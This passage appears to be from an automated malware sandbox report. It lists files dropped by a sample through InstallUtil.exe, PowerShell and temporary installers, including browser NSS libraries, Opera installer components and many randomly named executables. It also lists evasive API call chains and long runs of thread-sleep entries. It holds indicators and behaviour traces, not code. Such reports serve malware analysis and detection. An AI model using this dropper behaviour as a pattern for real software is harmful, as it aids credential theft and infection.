                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6667
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Window / User API: threadDelayed 8571
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_shfoldr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\ZMwlUWMtiNLOgzHdIp3EVbeM.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\eEM7C0Rv28sfywWhlfTCHeZU.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_setup64.tmp
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-NP3DM.tmp
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Opera_108.0.5067.24_Autoupdate_x64[1].exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\qz6mIWczIdkFWvUoxRClMBD1.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\sI7dZrzWguf80YTd4w1tJlxT.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\libogg-0.dll (copy)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\3TgecgfsPBFevp0C7lLcJJOk.exe
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Opera_108.0.5067.24_Autoupdate_x64[1].exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\unins000.exe (copy)
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\libvorbis-0.dll (copy)
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027440668612.dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Dropped PE file which has not been started: C:\ProgramData\nss3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\4Q81HIYmOK1SegnFxkPpwM9e.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\CetLHNUiPRGPPEJBiP5m1V59.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-QD6MG.tmp
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\K8iQZVR1QcKL7tq874t7OVK9.exe
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210280932613620.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\fHmeBOFDBp1fU4tXtZW1SwCU.exe
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210275032111804.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_setup64.tmp
                        Source: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210274997611284.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\vhpTjyAyaRSCIHDXWEzEV7G1.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\libbz2-1.dll (copy)
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\libgcc_s_dw2-1.dll (copy)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\TE3hLMsyayYuQeWvMvP9Nt4X.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\kMxkjYtyyi8n2ckmtmDaxJ9E.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\lznQzS1TH9pXKZRxAqzqQkL6.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_shfoldr.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-L0QM8.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\qG1eZgNFl32oR6XaByxxsti8.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\AdDlHuzgF8lFUsmxcjVFtutw.exe
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso877A.tmp\INetC.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\3Vvy4C64NGc3rMim5VqOvcXj.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\u9uxsYMpS7D32QErsHuYUixB.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-JGFR0.tmp
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_shfoldr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\zCH6Ixp4hDhbc4JHLXEIat9x.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_setup64.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\JqI9qtwrsBIQ597pcbH2GGod.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\libwinpthread-1.dll (copy)
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_iscrypt.dll
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027464559972.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\nGTzGa5UK9rAljUvktVMxS0i.exe
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-IJOFC.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\LAuOzs2TVXyzss3wQ1slqfrw.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\13TZhjPb0HxkQlPqajCRkSnB.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\o9mWBH3W8d1Wz63VdcWUPlCt.exe
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210280464513384.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\qEZDdAWnBbu94XDsWbevAW3Z.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\i7KTy1Vb7MGYU7JDB8adhZqD.exe
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128321\opera_package
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\6Q8Wwld29CZNDuak3WcfH07i.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-AD4K7.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\H07iGpAOLsi3Xl2Zht1ZcBjf.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_iscrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\wY4rC1FxrpCjj3T82kMrcxVU.exe
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_iscrypt.dll
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210275393811096.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\tOekaWBMtMvKgKTpn1rNSApR.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\Pictures\K3GYZyKSoKi9rBsYPEMYaWx1.exe
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128141\opera_package
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027455829404.dll
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Web Link Analyzer\is-07B68.tmp
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\SgAcco9DZkNoSLENpGeXyqR0.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\htMajCePjPdapCkAov1lc8J9.exe
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_12-5974
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_16-3239
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exe | API coverage: 4.9 %
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -99859s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -99750s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -99625s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -99448s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -99326s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -99212s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -99109s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -98984s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -98858s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -98744s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -98636s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -98527s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -98421s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -98312s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -98159s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -98032s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -97921s >= -30000s
                        Source: C:\Users\user\Desktop\file.exe TID: 7848 | Thread sleep time: -97806s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7700 | Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 44628 | Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 44576 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -10145709240540247s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -600000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44328 | Thread sleep time: -4800000s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44660 | Thread sleep count: 8571 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -599822s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -599671s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -599500s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -599368s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -599250s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -599140s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -599031s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -598922s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -598788s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -598667s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -598561s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -598417s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -598276s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -598136s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -598015s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -597781s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -597649s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -597527s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652 | Thread sleep time: -597379s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -597250s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -597057s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596941s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596812s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596680s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596592s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596447s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596312s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596191s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -596071s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595922s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595691s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595571s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595412s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595265s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595155s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -595046s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -594907s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -594750s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -594530s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -594368s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -594191s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593984s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593858s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593515s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593312s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593170s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -593057s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -592940s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -592816s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -592633s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -592406s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -592169s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -591953s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -591609s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -591281s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -591125s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -590906s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -590760s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -590593s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -590390s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -590109s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -589858s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -589672s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -589430s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -589156s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -588734s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -588468s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -587531s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -585843s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -585500s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -585156s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -584875s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -584684s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -584373s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -584181s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -583984s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -583788s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -583625s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -583281s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 44652Thread sleep time: -583093s >= -30000s
